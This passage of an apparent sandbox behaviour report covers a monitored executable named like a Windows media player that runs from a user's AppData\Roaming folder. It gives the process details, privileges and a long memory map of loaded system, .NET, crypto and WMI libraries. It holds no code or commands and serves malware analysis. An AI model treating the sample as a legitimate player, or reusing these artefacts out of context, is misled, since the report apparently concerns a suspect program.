os_tid = 0xad0 Thread: id = 82 os_tid = 0xac4 Thread: id = 83 os_tid = 0xa90 Thread: id = 84 os_tid = 0xa84 Thread: id = 85 os_tid = 0xa78 Thread: id = 86 os_tid = 0xa74 Thread: id = 87 os_tid = 0xa68 Thread: id = 293 os_tid = 0xa08 Thread: id = 341 os_tid = 0xf38 Thread: id = 397 os_tid = 0x10c0 Process: id = "4" image_name = "live-windowsplayer-version-492b7f0827474659.exe" filename = "c:\\users\\oqxzraykm\\appdata\\roaming\\live-windowsplayer-version-492b7f0827474659.exe" page_root = "0x4a691000" os_pid = "0x1518" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x14d4" cmd_line = "\"C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe\" " cur_dir = "C:\\Users\\OqXZRaykm\\Desktop\\" os_username = "PXTHFFRYO7\\OqXZRaykm" bitness = "32" os_groups = "PXTHFFRYO7\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001bd08" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1075 start_va = 0x10000 end_va = 0x47fff monitored = 1 entry_point = 0x1b17e region_type = mapped_file name = "live-windowsplayer-version-492b7f0827474659.exe" filename = "\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\live-windowsplayer-version-492b7f0827474659.exe") Region: id = 1076 start_va = 0x50000 end_va = 0x6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1077 start_va = 0x70000 end_va = 0x8cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1078 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1079 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1080 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1081 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1082 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1083 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1084 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 1085 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 1086 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1087 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 1088 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 1089 start_va = 0x400000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1090 start_va = 0x7fffae2a0000 end_va = 0x7fffae304fff monitored = 1 entry_point = 0x7fffae2cbd50 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 1091 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1092 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1093 start_va = 0x50000 end_va = 0x5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1094 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 1095 start_va = 0x400000 end_va = 0x4c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1096 start_va = 0x590000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 1097 start_va = 0x690000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1099 start_va = 0x60000 end_va = 0x66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1100 start_va = 0x7fffc7bb0000 end_va = 0x7fffc7c3ffff monitored = 0 entry_point = 0x7fffc7bc0880 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1101 start_va = 0x7ff4fdab0000 end_va = 0x7ff4fde8cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\apppatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 1103 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1104 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1105 start_va = 0x770000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 1106 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1107 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1108 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1109 start_va = 0x1d0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1110 start_va = 0x1d0000 end_va = 0x1d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1111 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1112 start_va = 0x7fffabe90000 end_va = 0x7fffabf38fff monitored = 1 entry_point = 0x7fffabe98150 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 1113 start_va = 0x7fffcb970000 end_va = 0x7fffcb9c4fff monitored = 0 entry_point = 0x7fffcb97a7e0 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1114 start_va = 0x4d0000 end_va = 0x502fff monitored = 1 entry_point = 0x4db17e region_type = mapped_file name = "live-windowsplayer-version-492b7f0827474659.exe" filename = "\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\live-windowsplayer-version-492b7f0827474659.exe") Region: id = 1115 start_va = 0x7fffc8120000 end_va = 0x7fffc8132fff monitored = 0 entry_point = 0x7fffc8123f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1116 start_va = 0x7fffb4400000 end_va = 0x7fffb4409fff monitored = 0 entry_point = 0x7fffb4401390 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1117 start_va = 0x870000 end_va = 0x1336fff monitored = 1 entry_point = 0x8763c0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll") Region: id = 1118 start_va = 0x7fffa7500000 end_va = 0x7fffa7fc6fff monitored = 1 entry_point = 0x7fffa75063c0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll") Region: id = 1119 start_va = 0x7fffbb230000 end_va = 0x7fffbb245fff monitored = 0 entry_point = 0x7fffbb23c000 region_type = mapped_file name = "vcruntime140_clr0400.dll" filename = "\\Windows\\System32\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\system32\\vcruntime140_clr0400.dll") Region: id = 1120 start_va = 0x7fffcb7a0000 end_va = 0x7fffcb93ffff monitored = 0 entry_point = 0x7fffcb7b7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1121 start_va = 0x7fffabdd0000 end_va = 0x7fffabe8cfff monitored = 0 entry_point = 0x7fffabe57db0 region_type = mapped_file name = "ucrtbase_clr0400.dll" filename = "\\Windows\\System32\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\system32\\ucrtbase_clr0400.dll") Region: id = 1122 start_va = 0x7fffca760000 end_va = 0x7fffca781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 1123 start_va = 0x7fffcc960000 end_va = 0x7fffcc989fff monitored = 0 entry_point = 0x7fffcc9648d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1124 start_va = 0x7fffca370000 end_va = 0x7fffca479fff monitored = 0 entry_point = 0x7fffca3a1300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 1125 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 1126 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1127 start_va = 0x1f0000 end_va = 0x1f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1128 start_va = 0x4d0000 end_va = 0x4fdfff monitored = 0 entry_point = 0x4d14d0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1129 start_va = 0x870000 end_va = 0xa6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 1130 start_va = 0x7fffcb940000 end_va = 0x7fffcb96ffff monitored = 0 entry_point = 0x7fffcb9414d0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1131 start_va = 0xa70000 end_va = 0xbf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 1132 start_va = 0xc00000 end_va = 0x2000fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 1133 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 1134 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1135 start_va = 0x4e0000 end_va = 0x4e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 1136 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 1137 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 1138 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1139 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1140 start_va = 0x7fff47ea0000 end_va = 0x7fff47eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff47ea0000" filename = "" Region: id = 1141 start_va = 0x7fff47eb0000 end_va = 0x7fff47ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff47eb0000" filename = "" Region: id = 1142 start_va = 0x7fff47ec0000 end_va = 0x7fff47f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff47ec0000" filename = "" Region: id = 1143 start_va = 0x7fff47f50000 end_va = 0x7fff47fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff47f50000" filename = "" Region: id = 1144 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1145 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1146 start_va = 0x2010000 end_va = 0x21cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 1147 start_va = 0x2010000 end_va = 0x216ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 1148 start_va = 0x21c0000 end_va = 0x21cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 1149 start_va = 0x2010000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 1150 start_va = 0x2160000 end_va = 0x216ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 1151 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1152 start_va = 0x21d0000 end_va = 0x1a1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 1153 start_va = 0x1a1d0000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a1d0000" filename = "" Region: id = 1154 start_va = 0x1a550000 end_va = 0x1a659fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a550000" filename = "" Region: id = 1155 start_va = 0x1a660000 end_va = 0x1a75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a660000" filename = "" Region: id = 1158 start_va = 0x1a760000 end_va = 0x1aa97fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1159 start_va = 0x7fffa5f00000 end_va = 0x7fffa74fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\de013c985ad100d05dc94ec118f77b92\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\mscorlib\\de013c985ad100d05dc94ec118f77b92\\mscorlib.ni.dll") Region: id = 1160 start_va = 0x7fffcbef0000 end_va = 0x7fffcc018fff monitored = 0 entry_point = 0x7fffcbf16140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1161 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1162 start_va = 0x1aaa0000 end_va = 0x1ab72fff monitored = 0 entry_point = 0x1aabd190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1164 start_va = 0x1aaa0000 end_va = 0x1abe4fff monitored = 0 entry_point = 0x1aafa9b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1165 start_va = 0x7fffca480000 end_va = 0x7fffca4fefff monitored = 0 entry_point = 0x7fffca4b73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1166 start_va = 0x7fffc7c60000 end_va = 0x7fffc7cfefff monitored = 0 entry_point = 0x7fffc7c89120 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1167 start_va = 0x690000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1168 start_va = 0x760000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 1169 start_va = 0x7ff4fddf0000 end_va = 0x7ff4fde8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fddf0000" filename = "" Region: id = 1170 start_va = 0x7ff4fdde0000 end_va = 0x7ff4fddeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdde0000" filename = "" Region: id = 1171 start_va = 0x7fff47fc0000 end_va = 0x7fff4803ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff47fc0000" filename = "" Region: id = 1172 start_va = 0x7fff48040000 end_va = 0x7fff4804ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48040000" filename = "" Region: id = 1173 start_va = 0x7fffab9b0000 end_va = 0x7fffabafefff monitored = 1 entry_point = 0x7fffab9b1090 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clrjit.dll") Region: id = 1174 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1175 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1176 start_va = 0x7fffa5280000 end_va = 0x7fffa5ef0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\808887ebadf1a37835b907c866cede3c\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system\\808887ebadf1a37835b907c866cede3c\\system.ni.dll") Region: id = 1177 start_va = 0x7fffa4800000 end_va = 0x7fffa5274fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\bd42a6d2da6a5a79a9f5db3fa08a5283\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.core\\bd42a6d2da6a5a79a9f5db3fa08a5283\\system.core.ni.dll") Region: id = 1178 start_va = 0x7fffa45d0000 end_va = 0x7fffa47f4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.visualbasic.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.V9921e851#\\1b297cd8658fe6a76f85d594efee9c8b\\Microsoft.VisualBasic.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.v9921e851#\\1b297cd8658fe6a76f85d594efee9c8b\\microsoft.visualbasic.ni.dll") Region: id = 1179 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1180 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1181 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1182 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1183 start_va = 0x710000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 1184 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1185 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1186 start_va = 0x7fffcaa60000 end_va = 0x7fffcaa86fff monitored = 0 entry_point = 0x7fffcaa68690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1187 start_va = 0x7fffc9a70000 end_va = 0x7fffc9a87fff monitored = 0 entry_point = 0x7fffc9a74aa0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1188 start_va = 0x7fffc9230000 end_va = 0x7fffc9263fff monitored = 0 entry_point = 0x7fffc9236e70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1189 start_va = 0x7fffc9a90000 end_va = 0x7fffc9a9bfff monitored = 0 entry_point = 0x7fffc9a92200 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1190 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1191 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1192 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1193 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1194 start_va = 0x7fffca060000 end_va = 0x7fffca090fff monitored = 0 entry_point = 0x7fffca06e380 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1195 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1196 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1197 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1198 start_va = 0x7fffcb340000 end_va = 0x7fffcb347fff monitored = 0 entry_point = 0x7fffcb341110 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1199 start_va = 0x7fffa4460000 end_va = 0x7fffa45c5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Management\\5e0d65edc2896cdb05874abda7e36dca\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.management\\5e0d65edc2896cdb05874abda7e36dca\\system.management.ni.dll") Region: id = 1201 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1202 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1203 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1204 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1205 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1206 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1207 start_va = 0x1aaa0000 end_va = 0x1ab9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aaa0000" filename = "" Region: id = 1208 start_va = 0x1aba0000 end_va = 0x1ace4fff monitored = 0 entry_point = 0x1abfa9b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1209 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1210 start_va = 0x7fffcbae0000 end_va = 0x7fffcbb87fff monitored = 0 entry_point = 0x7fffcbafd990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1211 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1212 start_va = 0x7fffb4750000 end_va = 0x7fffb4777fff monitored = 0 entry_point = 0x7fffb4759440 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1213 start_va = 0x1aba0000 end_va = 0x1ac9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aba0000" filename = "" Region: id = 1214 start_va = 0x1aca0000 end_va = 0x1ad9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aca0000" filename = "" Region: id = 1215 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1216 start_va = 0x7fffbe330000 end_va = 0x7fffbe3b5fff monitored = 0 entry_point = 0x7fffbe345570 region_type = mapped_file name = "wbemcomn.dll" filename = 